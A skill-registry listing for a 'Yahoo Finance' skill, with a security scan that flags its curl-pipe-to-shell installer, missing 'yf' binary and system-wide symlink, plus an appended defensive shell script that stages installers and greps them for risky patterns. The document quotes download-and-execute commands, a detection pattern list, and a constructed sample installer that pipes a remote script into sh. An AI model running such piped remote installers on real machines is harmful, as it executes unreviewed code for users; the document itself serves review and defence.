Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Yahoo Finance
v1.0.0
Get stock prices, quotes, fundamentals, earnings, options, dividends, and analyst ratings using Yahoo Finance. Uses the yfinance library - no API key required.
⭐ 41 · 16.8k · 162 current · 171 all-time
by @ajanraj
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious (medium confidence)
Purpose & Capability
The stated purpose (fetching Yahoo Finance data via yfinance) matches the libraries referenced (yfinance, rich). However, SKILL.md expects a local executable 'yf' under /path/to/skills/yahoo-finance/ that is not present in the package manifest (the package contains no code files at all). Requiring the 'uv' package manager is heavier than a plain yfinance script needs, and nothing in the description justifies it.
Instruction Scope
The instructions tell the user to run remote installation commands (curl https://astral.sh/uv/install.sh | sh, or a PowerShell Invoke-Expression equivalent), then chmod a 'yf' binary, symlink it into /usr/local/bin, and restart their shell. Those steps hand the installer broad discretion (download-and-execute) and place a binary in a system-wide PATH directory. The docs also assume files that are not bundled, which is a functional and integrity mismatch.
Install Mechanism
There is no formal install spec in the registry metadata, but SKILL.md recommends installing 'uv' via a remote install script (curl | sh) from astral.sh. Downloading and executing from an external URL is a high-risk install pattern unless you inspect the script first. The docs also offer several install methods (curl installer, Homebrew, pip), which is inconsistent but not in itself malicious.
Credentials
The skill declares no required environment variables, credentials, or config paths and the instructions do not request secrets. That is proportionate to the stated purpose.
Persistence & Privilege
The skill does not request 'always: true' and is user-invocable only. However, the suggested install steps (symlinking /usr/local/bin/yf) place a binary in a system-wide PATH directory and need write access there. That is normal for a CLI, but it widens the impact if the installed components turn out to be untrusted.
What to consider before installing
- The skill package contains no executable or script named 'yf' yet the README instructs you to chmod and symlink one. Ask the publisher to provide the 'yf' script or include code in the package.
- The SKILL.md recommends installing 'uv' by piping a remote install script (curl https://astral.sh/uv/install.sh | sh). Download-and-execute of remote scripts can run arbitrary code on your machine — do not run it without inspecting the script and trusting the host.
- Safer alternatives: create a Python virtualenv and pip install yfinance and rich yourself (pip install yfinance rich), then implement or review any wrapper script locally. Prefer installing from well-known package channels (pip, homebrew) rather than unknown remote installers.
- If you must use the provided installer, save the install script to a file first (curl -sL https://astral.sh/uv/install.sh -o uv-install.sh), read it, and then run that saved copy rather than fetching it again, so that what you reviewed is what you execute. Avoid running it as root, and avoid symlinking unknown binaries into system-wide locations until you have audited them.
- Request clarification from the skill author about why 'uv' is required, and ask them to bundle the 'yf' script or provide an explicit, auditable install artifact. If the author can't provide code or the install script's contents, treat this package as untrusted.
Like a lobster shell, security has layers — review code before you run it.
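The review steps above (stage the installer to disk instead of piping it to sh, read it for download-and-execute and system-wide writes, and use a user-local virtualenv instead of a /usr/local/bin symlink) worked through as an added shell example. This is not code from the ClawHub scan or from the yahoo-finance skill. It assumes curl, sha256sum and python3 are installed; the pattern list is an illustrative starting point rather than a complete detector, and the sample installer it reviews is constructed for the demo and is not astral.sh's real script.

```shell
#!/bin/sh
# Added example, not part of the ClawHub scan or of the yahoo-finance skill:
# stage a remote installer to disk and review it before any of it executes,
# instead of `curl ... | sh`; then install the Python dependencies in a
# user-local virtualenv instead of symlinking into /usr/local/bin.
# The pattern list and the sample installer below are constructed for
# illustration; the sample is NOT astral.sh's real installer.
set -eu

# Download to a file, never to a pipe, so the bytes you read are the bytes
# you later run; print the digest so a second download can be compared.
# Assumes curl and sha256sum are available. Not called by the demo below.
stage_installer() {
  curl -fsSL --proto '=https' --tlsv1.2 -o "$2" "$1"
  sha256sum "$2"
}

# One ERE per line: nested download-and-execute, decoded payloads, eval,
# privilege escalation, writes to system-wide dirs, shell startup edits.
RISKY_PATTERNS='curl[^|]*[|][[:space:]]*(ba)?sh
wget[^|]*[|][[:space:]]*(ba)?sh
base64[[:space:]]+(-d|--decode)
(^|[^[:alnum:]_])eval([^[:alnum:]_]|$)
(^|[^[:alnum:]_])sudo([^[:alnum:]_]|$)
/usr/local/(bin|lib)
\$HOME/\.(bashrc|zshrc|profile)|~/\.(bashrc|zshrc|profile)'

# Print every matching line of the script ($1) to stderr and echo the number
# of pattern classes that matched; 0 means nothing in the list was found.
count_risky_patterns() {
  hits=0
  while IFS= read -r p; do
    [ -n "$p" ] || continue
    if grep -nE -- "$p" "$1" >&2; then
      hits=$((hits + 1))
    fi
  done <<EOF
$RISKY_PATTERNS
EOF
  echo "$hits"
}

# Constructed sample installer exercising two of the classes above
# (a nested curl | sh and an edit to ~/.bashrc).
write_sample_installer() {
  cat > "$1" <<'EOF'
#!/bin/sh
set -e
curl -fsSL https://example.invalid/uv.tar.gz -o /tmp/uv.tar.gz
tar -xzf /tmp/uv.tar.gz -C "$HOME/.local/bin"
echo 'export PATH="$HOME/.local/bin:$PATH"' >> "$HOME/.bashrc"
curl -fsSL https://example.invalid/post-install.sh | sh
EOF
}

# Safer alternative from the scan's recommendations: a user-local virtualenv
# plus a wrapper under $HOME/.local/bin, so /usr/local/bin is never touched.
# $1 is the reviewed skill directory that must contain the 'yf' script the
# SKILL.md refers to (the package ships none, so this refuses until it exists).
# Needs network for pip. Not called by the demo below.
setup_user_local_env() {
  skill=$1
  venv=${2:-$HOME/.venvs/yahoo-finance}
  [ -f "$skill/yf" ] || { echo "no $skill/yf to wrap; ask the publisher for it" >&2; return 1; }
  python3 -m venv "$venv"
  "$venv/bin/pip" install yfinance rich
  mkdir -p "$HOME/.local/bin"
  printf '#!/bin/sh\nexec "%s/bin/python" "%s/yf" "$@"\n' "$venv" "$skill" > "$HOME/.local/bin/yf"
  chmod 0755 "$HOME/.local/bin/yf"
}

# Offline demo: write the constructed sample, review it, report the count.
review_sample() {
  tmp=$(mktemp)
  write_sample_installer "$tmp"
  n=$(count_risky_patterns "$tmp")
  rm -f "$tmp"
  echo "$n"
}

sample_hits=$(review_sample)
echo "pattern classes flagged in the sample installer: $sample_hits (read those lines before running anything)"
```

The staged-file approach matters more than the pattern list: a piped installer can be served different bytes to a browser and to curl, and a second fetch can differ from the first, so review and execution must use the same saved copy. Treat a non-zero count as "read the flagged lines", not as proof of malice; legitimate installers do edit shell startup files.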
latest: vk97cjmzj7czqcdb5t3jrj7gdsn7ysw83
